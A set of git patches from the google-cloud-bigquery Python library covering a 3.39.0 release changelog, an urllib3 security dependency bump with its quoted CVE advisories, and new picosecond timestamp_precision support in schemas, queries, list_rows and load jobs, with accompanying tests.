google-cloud-bigquery: 3.39.0 ## [3.39.0](https://github.com/googleapis/python-bigquery/compare/v3.38.0...v3.39.0) (2025-12-12) ### Features * adds support for Python runtime 3.14 (#2322) ([6065e14c](https://github.com/googleapis/python-bigquery/commit/6065e14c)) * Add ExternalRuntimeOptions to BigQuery routine (#2311) ([fa76e310](https://github.com/googleapis/python-bigquery/commit/fa76e310)) ### Bug Fixes * remove ambiguous error codes from query retries (#2308) ([8bbd3d01](https://github.com/googleapis/python-bigquery/commit/8bbd3d01)) * include `io.Base` in the `PathType` (#2323) ([b11e09cb](https://github.com/googleapis/python-bigquery/commit/b11e09cb)) * honor custom `retry` in `job.result()` (#2302) ([e118b029](https://github.com/googleapis/python-bigquery/commit/e118b029)) ### Documentation * remove experimental annotations from GA features (#2303) ([1f1f9d41](https://github.com/googleapis/python-bigquery/commit/1f1f9d41))
Co-authored-by: Daniel Sanche --- .librarian/state.yaml | 3 ++- CHANGELOG.md | 20 ++++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 3 files changed, 23 insertions(+), 2 deletions(-) diff --git a/.librarian/state.yaml b/.librarian/state.yaml index b5d3126e4..8d67105e3 100644 --- a/.librarian/state.yaml +++ b/.librarian/state.yaml @@ -1,7 +1,8 @@ image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620 libraries: - id: google-cloud-bigquery - version: 3.38.0 + version: 3.39.0 + last_generated_commit: "" apis: [] source_roots: - . diff --git a/CHANGELOG.md b/CHANGELOG.md index 95db5735c..4cf177cc5 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -4,6 +4,26 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.39.0](https://github.com/googleapis/google-cloud-python/compare/google-cloud-bigquery-v3.38.0...google-cloud-bigquery-v3.39.0) (2025-12-12) + + +### Documentation + +* remove experimental annotations from GA features (#2303) ([1f1f9d41e8a2c9016198d848ad3f1cbb88cf77b0](https://github.com/googleapis/google-cloud-python/commit/1f1f9d41e8a2c9016198d848ad3f1cbb88cf77b0)) + + +### Features + +* adds support for Python runtime 3.14 (#2322) ([6065e14c448cb430189982dd70025fa0575777ca](https://github.com/googleapis/google-cloud-python/commit/6065e14c448cb430189982dd70025fa0575777ca)) +* Add ExternalRuntimeOptions to BigQuery routine (#2311) ([fa76e310a16ea6cba0071ff1d767ca1c71514da7](https://github.com/googleapis/google-cloud-python/commit/fa76e310a16ea6cba0071ff1d767ca1c71514da7)) + + +### Bug Fixes + +* include `io.Base` in the `PathType` (#2323) ([b11e09cb6ee32e451b37eda66bece2220b9ceaba](https://github.com/googleapis/google-cloud-python/commit/b11e09cb6ee32e451b37eda66bece2220b9ceaba)) +* honor custom `retry` in `job.result()` (#2302) 
([e118b029bbc89a5adbab83f39858c356c23665bf](https://github.com/googleapis/google-cloud-python/commit/e118b029bbc89a5adbab83f39858c356c23665bf)) +* remove ambiguous error codes from query retries (#2308) ([8bbd3d01026c493dfa5903b397d2b01c0e9bf43b](https://github.com/googleapis/google-cloud-python/commit/8bbd3d01026c493dfa5903b397d2b01c0e9bf43b)) + ## [3.38.0](https://github.com/googleapis/python-bigquery/compare/v3.37.0...v3.38.0) (2025-09-15) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 22550a8f1..1d5e35889 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.38.0" +__version__ = "3.39.0" From bfd9d8da91d0cb1a1e5d87007fa8a5462486dca9 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 17 Dec 2025 01:02:06 +0000 Subject: [PATCH 191/202] chore(deps): update dependency urllib3 to v2.6.0 [security] (#2342) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [urllib3](https://redirect.github.com/urllib3/urllib3) ([changelog](https://redirect.github.com/urllib3/urllib3/blob/main/CHANGES.rst)) | `==2.5.0` -> `==2.6.0` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/urllib3/2.6.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/urllib3/2.5.0/2.6.0?slim=true) | ### GitHub Vulnerability Alerts #### [CVE-2025-66418](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53) ## Impact urllib3 supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., `Content-Encoding: gzip, zstd`). 
However, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data. ## Affected usages Applications and libraries using urllib3 version 2.5.0 and earlier for HTTP requests to untrusted sources unless they disable content decoding explicitly. ## Remediation Upgrade to at least urllib3 v2.6.0 in which the library limits the number of links to 5. If upgrading is not immediately possible, use [`preload_content=False`](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) and ensure that `resp.headers["content-encoding"]` contains a safe number of encodings before reading the response content. #### [CVE-2025-66471](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37) ### Impact urllib3's [streaming API](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. When streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation. The decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side, even if the application only requested a small chunk of data. 
### Affected usages Applications and libraries using urllib3 version 2.5.0 and earlier to stream large compressed responses or content from untrusted sources. `stream()`, `read(amt=256)`, `read1(amt=256)`, `read_chunked(amt=256)`, `readinto(b)` are examples of `urllib3.HTTPResponse` method calls using the affected logic unless decoding is disabled explicitly. ### Remediation Upgrade to at least urllib3 v2.6.0 in which the library avoids decompressing data that exceeds the requested amount. If your environment contains a package facilitating the Brotli encoding, upgrade to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 too. These versions are enforced by the `urllib3[brotli]` extra in the patched versions of urllib3. ### Credits The issue was reported by @​Cycloctane. Supplemental information was provided by @​stamparm during a security audit performed by [7ASecurity](https://7asecurity.com/) and facilitated by [OSTIF](https://ostif.org/). --- ### Release Notes
urllib3/urllib3 (urllib3) ### [`v2.6.0`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#260-2025-12-05) [Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.5.0...2.6.0) \================== ## Security - Fixed a security issue where streaming API could improperly handle highly compressed HTTP content ("decompression bombs") leading to excessive resource consumption even when a small amount of data was requested. Reading small chunks of compressed data is safer and much more efficient now. (`GHSA-2xpw-w6gg-jr37 `\_\_) - Fixed a security issue where an attacker could compose an HTTP response with virtually unlimited links in the `Content-Encoding` header, potentially leading to a denial of service (DoS) attack by exhausting system resources during decoding. The number of allowed chained encodings is now limited to 5. (`GHSA-gm62-xv2j-4w53 `\_\_) .. caution:: - If urllib3 is not installed with the optional `urllib3[brotli]` extra, but your environment contains a Brotli/brotlicffi/brotlipy package anyway, make sure to upgrade it to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 to benefit from the security fixes and avoid warnings. Prefer using `urllib3[brotli]` to install a compatible Brotli package automatically. - If you use custom decompressors, please make sure to update them to respect the changed API of `urllib3.response.ContentDecoder`. ## Features - Enabled retrieval, deletion, and membership testing in `HTTPHeaderDict` using bytes keys. (`#​3653 `\_\_) - Added host and port information to string representations of `HTTPConnection`. (`#​3666 `\_\_) - Added support for Python 3.14 free-threading builds explicitly. (`#​3696 `\_\_) ## Removals - Removed the `HTTPResponse.getheaders()` method in favor of `HTTPResponse.headers`. Removed the `HTTPResponse.getheader(name, default)` method in favor of `HTTPResponse.headers.get(name, default)`. 
(`#​3622 `\_\_) ## Bugfixes - Fixed redirect handling in `urllib3.PoolManager` when an integer is passed for the retries parameter. (`#​3649 `\_\_) - Fixed `HTTPConnectionPool` when used in Emscripten with no explicit port. (`#​3664 `\_\_) - Fixed handling of `SSLKEYLOGFILE` with expandable variables. (`#​3700 `\_\_) ## Misc - Changed the `zstd` extra to install `backports.zstd` instead of `zstandard` on Python 3.13 and before. (`#​3693 `\_\_) - Improved the performance of content decoding by optimizing `BytesQueueBuffer` class. (`#​3710 `\_\_) - Allowed building the urllib3 package with newer setuptools-scm v9.x. (`#​3652 `\_\_) - Ensured successful urllib3 builds by setting Hatchling requirement to >= 1.27.0. (`#​3638 `\_\_)
 --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery). Co-authored-by: Lingqing Gan --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 8955e0cfd..ec5c7f2af 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -41,4 +41,4 @@ Shapely==2.1.2; python_version >= '3.10' six==1.17.0 typing-extensions==4.15.0 typing-inspect==0.9.0 -urllib3==2.5.0 +urllib3==2.6.0 From 8d5785aea50b9f9e5b13bd4c91e8a08d6dac7778 Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Fri, 19 Dec 2025 10:44:31 -0800 Subject: [PATCH 192/202] feat: support timestamp_precision in table schema (#2333) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Thank you for opening a Pull Request! Before submitting your PR, there are a few things you can do to make sure it goes smoothly: - [ ] Make sure to open an issue as a [bug/issue](https://github.com/googleapis/python-bigquery/issues/new/choose) before writing your code! 
That way we can discuss the change, evaluate designs, and agree on the general idea - [ ] Ensure the tests and linter pass - [ ] Code coverage does not decrease (if any source code was changed) - [ ] Appropriate docs were updated (if necessary) Fixes # 🦕 --------- Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com> --- google/cloud/bigquery/enums.py | 15 ++++++++ google/cloud/bigquery/schema.py | 55 ++++++++++++++++++++++++----- tests/system/test_client.py | 23 +++++++++++++ tests/unit/test_schema.py | 61 ++++++++++++++++++++++++++++++++- 4 files changed, 144 insertions(+), 10 deletions(-) diff --git a/google/cloud/bigquery/enums.py b/google/cloud/bigquery/enums.py index 1b1eb241a..dc67f9674 100644 --- a/google/cloud/bigquery/enums.py +++ b/google/cloud/bigquery/enums.py @@ -480,3 +480,18 @@ class SourceColumnMatch(str, enum.Enum): NAME = "NAME" """Matches by name. This reads the header row as column names and reorders columns to match the field names in the schema.""" + + +class TimestampPrecision(enum.Enum): + """Precision (maximum number of total digits in base 10) for seconds of + TIMESTAMP type.""" + + MICROSECOND = None + """ + Default, for TIMESTAMP type with microsecond precision. + """ + + PICOSECOND = 12 + """ + For TIMESTAMP type with picosecond precision. + """ diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index 456730b00..1809df21f 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -196,6 +196,14 @@ class SchemaField(object): Only valid for top-level schema fields (not nested fields). If the type is FOREIGN, this field is required. + + timestamp_precision: Optional[enums.TimestampPrecision] + Precision (maximum number of total digits in base 10) for seconds + of TIMESTAMP type. + + Defaults to `enums.TimestampPrecision.MICROSECOND` (`None`) for + microsecond precision. 
Use `enums.TimestampPrecision.PICOSECOND` + (`12`) for picosecond precision. """ def __init__( @@ -213,6 +221,7 @@ def __init__( range_element_type: Union[FieldElementType, str, None] = None, rounding_mode: Union[enums.RoundingMode, str, None] = None, foreign_type_definition: Optional[str] = None, + timestamp_precision: Optional[enums.TimestampPrecision] = None, ): self._properties: Dict[str, Any] = { "name": name, @@ -237,6 +246,13 @@ def __init__( if isinstance(policy_tags, PolicyTagList) else None ) + if isinstance(timestamp_precision, enums.TimestampPrecision): + self._properties["timestampPrecision"] = timestamp_precision.value + elif timestamp_precision is not None: + raise ValueError( + "timestamp_precision must be class enums.TimestampPrecision " + f"or None, got {type(timestamp_precision)} instead." + ) if isinstance(range_element_type, str): self._properties["rangeElementType"] = {"type": range_element_type} if isinstance(range_element_type, FieldElementType): @@ -254,15 +270,22 @@ def from_api_repr(cls, api_repr: dict) -> "SchemaField": """Return a ``SchemaField`` object deserialized from a dictionary. Args: - api_repr (Mapping[str, str]): The serialized representation - of the SchemaField, such as what is output by - :meth:`to_api_repr`. + api_repr (dict): The serialized representation of the SchemaField, + such as what is output by :meth:`to_api_repr`. Returns: google.cloud.bigquery.schema.SchemaField: The ``SchemaField`` object. """ placeholder = cls("this_will_be_replaced", "PLACEHOLDER") + # The API would return a string despite we send an integer. To ensure + # success of resending received schema, we convert string to integer + # to ensure consistency. + try: + api_repr["timestampPrecision"] = int(api_repr["timestampPrecision"]) + except (TypeError, KeyError): + pass + # Note: we don't make a copy of api_repr because this can cause # unnecessary slowdowns, especially on deeply nested STRUCT / RECORD # fields. 
See https://github.com/googleapis/python-bigquery/issues/6 @@ -374,6 +397,16 @@ def policy_tags(self): resource = self._properties.get("policyTags") return PolicyTagList.from_api_repr(resource) if resource is not None else None + @property + def timestamp_precision(self) -> enums.TimestampPrecision: + """Precision (maximum number of total digits in base 10) for seconds of + TIMESTAMP type. + + Returns: + enums.TimestampPrecision: value of TimestampPrecision. + """ + return enums.TimestampPrecision(self._properties.get("timestampPrecision")) + def to_api_repr(self) -> dict: """Return a dictionary representing this schema field. @@ -408,6 +441,8 @@ def _key(self): None if self.policy_tags is None else tuple(sorted(self.policy_tags.names)) ) + timestamp_precision = self._properties.get("timestampPrecision") + return ( self.name, field_type, @@ -417,6 +452,7 @@ def _key(self): self.description, self.fields, policy_tags, + timestamp_precision, ) def to_standard_sql(self) -> standard_sql.StandardSqlField: @@ -467,10 +503,9 @@ def __hash__(self): return hash(self._key()) def __repr__(self): - key = self._key() - policy_tags = key[-1] + *initial_tags, policy_tags, timestamp_precision_tag = self._key() policy_tags_inst = None if policy_tags is None else PolicyTagList(policy_tags) - adjusted_key = key[:-1] + (policy_tags_inst,) + adjusted_key = (*initial_tags, policy_tags_inst, timestamp_precision_tag) return f"{self.__class__.__name__}{adjusted_key}" @@ -530,9 +565,11 @@ def _to_schema_fields(schema): if isinstance(schema, Sequence): # Input is a Sequence (e.g. 
a list): Process and return a list of SchemaFields return [ - field - if isinstance(field, SchemaField) - else SchemaField.from_api_repr(field) + ( + field + if isinstance(field, SchemaField) + else SchemaField.from_api_repr(field) + ) for field in schema ] diff --git a/tests/system/test_client.py b/tests/system/test_client.py index 6584ca03c..3d32a3634 100644 --- a/tests/system/test_client.py +++ b/tests/system/test_client.py @@ -74,6 +74,16 @@ bigquery.SchemaField("full_name", "STRING", mode="REQUIRED"), bigquery.SchemaField("age", "INTEGER", mode="REQUIRED"), ] +SCHEMA_PICOSECOND = [ + bigquery.SchemaField("full_name", "STRING", mode="REQUIRED"), + bigquery.SchemaField("age", "INTEGER", mode="REQUIRED"), + bigquery.SchemaField( + "time_pico", + "TIMESTAMP", + mode="REQUIRED", + timestamp_precision=enums.TimestampPrecision.PICOSECOND, + ), +] CLUSTERING_SCHEMA = [ bigquery.SchemaField("full_name", "STRING", mode="REQUIRED"), bigquery.SchemaField("age", "INTEGER", mode="REQUIRED"), @@ -631,6 +641,19 @@ def test_create_table_w_time_partitioning_w_clustering_fields(self): self.assertEqual(time_partitioning.field, "transaction_time") self.assertEqual(table.clustering_fields, ["user_email", "store_code"]) + def test_create_table_w_picosecond_timestamp(self): + dataset = self.temp_dataset(_make_dataset_id("create_table")) + table_id = "test_table" + table_arg = Table(dataset.table(table_id), schema=SCHEMA_PICOSECOND) + self.assertFalse(_table_exists(table_arg)) + + table = helpers.retry_403(Config.CLIENT.create_table)(table_arg) + self.to_delete.insert(0, table) + + self.assertTrue(_table_exists(table)) + self.assertEqual(table.table_id, table_id) + self.assertEqual(table.schema, SCHEMA_PICOSECOND) + def test_delete_dataset_with_string(self): dataset_id = _make_dataset_id("delete_table_true_with_string") project = Config.CLIENT.project diff --git a/tests/unit/test_schema.py b/tests/unit/test_schema.py index c63a8312c..f61b22035 100644 --- a/tests/unit/test_schema.py 
+++ b/tests/unit/test_schema.py @@ -52,6 +52,9 @@ def test_constructor_defaults(self): self.assertIsNone(field.default_value_expression) self.assertEqual(field.rounding_mode, None) self.assertEqual(field.foreign_type_definition, None) + self.assertEqual( + field.timestamp_precision, enums.TimestampPrecision.MICROSECOND + ) def test_constructor_explicit(self): FIELD_DEFAULT_VALUE_EXPRESSION = "This is the default value for this field" @@ -69,6 +72,7 @@ def test_constructor_explicit(self): default_value_expression=FIELD_DEFAULT_VALUE_EXPRESSION, rounding_mode=enums.RoundingMode.ROUNDING_MODE_UNSPECIFIED, foreign_type_definition="INTEGER", + timestamp_precision=enums.TimestampPrecision.PICOSECOND, ) self.assertEqual(field.name, "test") self.assertEqual(field.field_type, "STRING") @@ -87,6 +91,10 @@ def test_constructor_explicit(self): ) self.assertEqual(field.rounding_mode, "ROUNDING_MODE_UNSPECIFIED") self.assertEqual(field.foreign_type_definition, "INTEGER") + self.assertEqual( + field.timestamp_precision, + enums.TimestampPrecision.PICOSECOND, + ) def test_constructor_explicit_none(self): field = self._make_one("test", "STRING", description=None, policy_tags=None) @@ -189,6 +197,23 @@ def test_to_api_repr_with_subfield(self): }, ) + def test_to_api_repr_w_timestamp_precision(self): + field = self._make_one( + "foo", + "TIMESTAMP", + "NULLABLE", + timestamp_precision=enums.TimestampPrecision.PICOSECOND, + ) + self.assertEqual( + field.to_api_repr(), + { + "mode": "NULLABLE", + "name": "foo", + "type": "TIMESTAMP", + "timestampPrecision": 12, + }, + ) + def test_from_api_repr(self): field = self._get_target_class().from_api_repr( { @@ -198,6 +223,7 @@ def test_from_api_repr(self): "name": "foo", "type": "record", "roundingMode": "ROUNDING_MODE_UNSPECIFIED", + "timestampPrecision": 12, } ) self.assertEqual(field.name, "foo") @@ -210,6 +236,10 @@ def test_from_api_repr(self): self.assertEqual(field.fields[0].mode, "NULLABLE") self.assertEqual(field.range_element_type, 
None) self.assertEqual(field.rounding_mode, "ROUNDING_MODE_UNSPECIFIED") + self.assertEqual( + field.timestamp_precision, + enums.TimestampPrecision.PICOSECOND, + ) def test_from_api_repr_policy(self): field = self._get_target_class().from_api_repr( @@ -264,6 +294,17 @@ def test_from_api_repr_defaults(self): self.assertNotIn("policyTags", field._properties) self.assertNotIn("rangeElementType", field._properties) + def test_from_api_repr_timestamp_precision_str(self): + # The backend would return timestampPrecision field as a string, even + # if we send over an integer. This test verifies we manually converted + # it into integer to ensure resending could succeed. + field = self._get_target_class().from_api_repr( + { + "timestampPrecision": "12", + } + ) + self.assertEqual(field._properties["timestampPrecision"], 12) + def test_name_property(self): name = "lemon-ness" schema_field = self._make_one(name, "INTEGER") @@ -323,6 +364,22 @@ def test_foreign_type_definition_property_str(self): schema_field._properties["foreignTypeDefinition"] = FOREIGN_TYPE_DEFINITION self.assertEqual(schema_field.foreign_type_definition, FOREIGN_TYPE_DEFINITION) + def test_timestamp_precision_unsupported_type(self): + with pytest.raises(ValueError) as e: + self._make_one("test", "TIMESTAMP", timestamp_precision=12) + + assert "timestamp_precision must be class enums.TimestampPrecision" in str( + e.value + ) + + def test_timestamp_precision_property(self): + TIMESTAMP_PRECISION = enums.TimestampPrecision.PICOSECOND + schema_field = self._make_one("test", "TIMESTAMP") + schema_field._properties[ + "timestampPrecision" + ] = enums.TimestampPrecision.PICOSECOND.value + self.assertEqual(schema_field.timestamp_precision, TIMESTAMP_PRECISION) + def test_to_standard_sql_simple_type(self): examples = ( # a few legacy types @@ -637,7 +694,9 @@ def test___hash__not_equals(self): def test___repr__(self): field1 = self._make_one("field1", "STRING") - expected = "SchemaField('field1', 'STRING', 
'NULLABLE', None, None, (), None)" + expected = ( + "SchemaField('field1', 'STRING', 'NULLABLE', None, None, (), None, None)" + ) self.assertEqual(repr(field1), expected) def test___repr__evaluable_no_policy_tags(self): From 46764a59ca7a21ed14ad2c91eb7f98c302736c22 Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Mon, 5 Jan 2026 18:42:05 -0800 Subject: [PATCH 193/202] feat: support load_table and list_rows with picosecond timestamp (#2351) --- google/cloud/bigquery/_helpers.py | 10 ++- google/cloud/bigquery/_job_helpers.py | 20 ++++- google/cloud/bigquery/client.py | 31 ++++++- google/cloud/bigquery/job/load.py | 30 +++++++ tests/data/pico.csv | 3 + tests/data/pico_schema.json | 8 ++ tests/system/conftest.py | 19 +++++ tests/system/test_client.py | 23 ++++++ tests/system/test_list_rows.py | 20 +++++ tests/system/test_query.py | 13 +++ tests/unit/_helpers/test_cell_data_parser.py | 13 ++- tests/unit/job/test_load_config.py | 33 ++++++++ tests/unit/test__job_helpers.py | 30 +++++++ tests/unit/test_client.py | 85 +++++++++++++++++++- 14 files changed, 328 insertions(+), 10 deletions(-) create mode 100644 tests/data/pico.csv create mode 100644 tests/data/pico_schema.json diff --git a/google/cloud/bigquery/_helpers.py b/google/cloud/bigquery/_helpers.py index c7d7705e0..a35fe1677 100644 --- a/google/cloud/bigquery/_helpers.py +++ b/google/cloud/bigquery/_helpers.py @@ -32,6 +32,8 @@ from google.cloud._helpers import _RFC3339_MICROS from google.cloud._helpers import _RFC3339_NO_FRACTION from google.cloud._helpers import _to_bytes +from google.cloud.bigquery import enums + from google.auth import credentials as ga_credentials # type: ignore from google.api_core import client_options as client_options_lib @@ -252,11 +254,15 @@ def bytes_to_py(self, value, field): if _not_null(value, field): return base64.standard_b64decode(_to_bytes(value)) - def timestamp_to_py(self, value, field): - """Coerce 'value' to a datetime, if set or not nullable.""" + def timestamp_to_py(self, 
value, field) -> Union[datetime.datetime, str, None]: + """Coerce 'value' to a datetime, if set or not nullable. If timestamp + is of picosecond precision, preserve the string format.""" + if field.timestamp_precision == enums.TimestampPrecision.PICOSECOND: + return value if _not_null(value, field): # value will be a integer in seconds, to microsecond precision, in UTC. return _datetime_from_microseconds(int(value)) + return None def datetime_to_py(self, value, field): """Coerce 'value' to a datetime, if set or not nullable. diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index 27e90246f..30f89759e 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -49,6 +49,7 @@ import google.api_core.exceptions as core_exceptions from google.api_core import retry as retries +from google.cloud.bigquery import enums from google.cloud.bigquery import job import google.cloud.bigquery.job.query import google.cloud.bigquery.query @@ -265,6 +266,7 @@ def _to_query_request( query: str, location: Optional[str] = None, timeout: Optional[float] = None, + timestamp_precision: Optional[enums.TimestampPrecision] = None, ) -> Dict[str, Any]: """Transform from Job resource to QueryRequest resource. @@ -285,10 +287,15 @@ def _to_query_request( # Default to standard SQL. request_body.setdefault("useLegacySql", False) - # Since jobs.query can return results, ensure we use the lossless timestamp - # format. See: https://github.com/googleapis/python-bigquery/issues/395 request_body.setdefault("formatOptions", {}) - request_body["formatOptions"]["useInt64Timestamp"] = True # type: ignore + + # Cannot specify both use_int64_timestamp and timestamp_output_format. + if timestamp_precision == enums.TimestampPrecision.PICOSECOND: + request_body["formatOptions"]["timestampOutputFormat"] = "ISO8601_STRING" # type: ignore + else: + # Since jobs.query can return results, ensure we use the lossless + # timestamp format. 
See: https://github.com/googleapis/python-bigquery/issues/395 + request_body["formatOptions"]["useInt64Timestamp"] = True # type: ignore if timeout is not None: # Subtract a buffer for context switching, network latency, etc. @@ -370,6 +377,7 @@ def query_jobs_query( retry: retries.Retry, timeout: Optional[float], job_retry: Optional[retries.Retry], + timestamp_precision: Optional[enums.TimestampPrecision] = None, ) -> job.QueryJob: """Initiate a query using jobs.query with jobCreationMode=JOB_CREATION_REQUIRED. @@ -377,7 +385,11 @@ def query_jobs_query( """ path = _to_query_path(project) request_body = _to_query_request( - query=query, job_config=job_config, location=location, timeout=timeout + query=query, + job_config=job_config, + location=location, + timeout=timeout, + timestamp_precision=timestamp_precision, ) def do_query(): diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index c50e7c2d7..e3a3cdb11 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -3469,6 +3469,8 @@ def query( timeout: TimeoutType = DEFAULT_TIMEOUT, job_retry: Optional[retries.Retry] = DEFAULT_JOB_RETRY, api_method: Union[str, enums.QueryApiMethod] = enums.QueryApiMethod.INSERT, + *, + timestamp_precision: Optional[enums.TimestampPrecision] = None, ) -> job.QueryJob: """Run a SQL query. @@ -3524,6 +3526,11 @@ def query( See :class:`google.cloud.bigquery.enums.QueryApiMethod` for details on the difference between the query start methods. + timestamp_precision (Optional[enums.TimestampPrecision]): + [Private Preview] If set to `enums.TimestampPrecision.PICOSECOND`, + timestamp columns of picosecond precision will be returned with + full precision. Otherwise, will truncate to microsecond + precision. Only applies when api_method == `enums.QueryApiMethod.QUERY`. Returns: google.cloud.bigquery.job.QueryJob: A new query job instance. 
@@ -3543,6 +3550,15 @@ def query( "`job_id` was provided, but the 'QUERY' `api_method` was requested." ) + if ( + timestamp_precision == enums.TimestampPrecision.PICOSECOND + and api_method != enums.QueryApiMethod.QUERY + ): + raise ValueError( + "Picosecond Timestamp is only supported when `api_method " + "== enums.QueryApiMethod.QUERY`." + ) + if project is None: project = self.project @@ -3568,6 +3584,7 @@ def query( retry, timeout, job_retry, + timestamp_precision=timestamp_precision, ) elif api_method == enums.QueryApiMethod.INSERT: return _job_helpers.query_jobs_insert( @@ -4062,6 +4079,8 @@ def list_rows( page_size: Optional[int] = None, retry: retries.Retry = DEFAULT_RETRY, timeout: TimeoutType = DEFAULT_TIMEOUT, + *, + timestamp_precision: Optional[enums.TimestampPrecision] = None, ) -> RowIterator: """List the rows of the table. @@ -4110,6 +4129,11 @@ def list_rows( before using ``retry``. If multiple requests are made under the hood, ``timeout`` applies to each individual request. + timestamp_precision (Optional[enums.TimestampPrecision]): + [Private Preview] If set to `enums.TimestampPrecision.PICOSECOND`, + timestamp columns of picosecond precision will be returned with + full precision. Otherwise, will truncate to microsecond + precision. Returns: google.cloud.bigquery.table.RowIterator: @@ -4143,7 +4167,12 @@ def list_rows( if start_index is not None: params["startIndex"] = start_index - params["formatOptions.useInt64Timestamp"] = True + # Cannot specify both use_int64_timestamp and timestamp_output_format. 
+ if timestamp_precision == enums.TimestampPrecision.PICOSECOND: + params["formatOptions.timestampOutputFormat"] = "ISO8601_STRING" + else: + params["formatOptions.useInt64Timestamp"] = True + row_iterator = RowIterator( client=self, api_request=functools.partial(self._call_api, retry, timeout=timeout), diff --git a/google/cloud/bigquery/job/load.py b/google/cloud/bigquery/job/load.py index 8cdb779ac..9c74f7124 100644 --- a/google/cloud/bigquery/job/load.py +++ b/google/cloud/bigquery/job/load.py @@ -759,6 +759,36 @@ def column_name_character_map(self, value: Optional[str]): value = ColumnNameCharacterMap.COLUMN_NAME_CHARACTER_MAP_UNSPECIFIED self._set_sub_prop("columnNameCharacterMap", value) + @property + def timestamp_target_precision(self) -> Optional[List[int]]: + """Optional[list[int]]: [Private Preview] Precisions (maximum number of + total digits in base 10) for seconds of TIMESTAMP types that are + allowed to the destination table for autodetection mode. + + Available for the formats: CSV. + + For the CSV Format, Possible values include: + None, [], or [6]: timestamp(6) for all auto detected TIMESTAMP + columns. + [6, 12]: timestamp(6) for all auto detected TIMESTAMP columns that + have less than 6 digits of subseconds. timestamp(12) for all auto + detected TIMESTAMP columns that have more than 6 digits of + subseconds. + [12]: timestamp(12) for all auto detected TIMESTAMP columns. + + The order of the elements in this array is ignored. Inputs that have + higher precision than the highest target precision in this array will + be truncated. + """ + return self._get_sub_prop("timestampTargetPrecision") + + @timestamp_target_precision.setter + def timestamp_target_precision(self, value: Optional[List[int]]): + if value is not None: + self._set_sub_prop("timestampTargetPrecision", value) + else: + self._del_sub_prop("timestampTargetPrecision") + class LoadJob(_AsyncJob): """Asynchronous job for loading data into a table. 
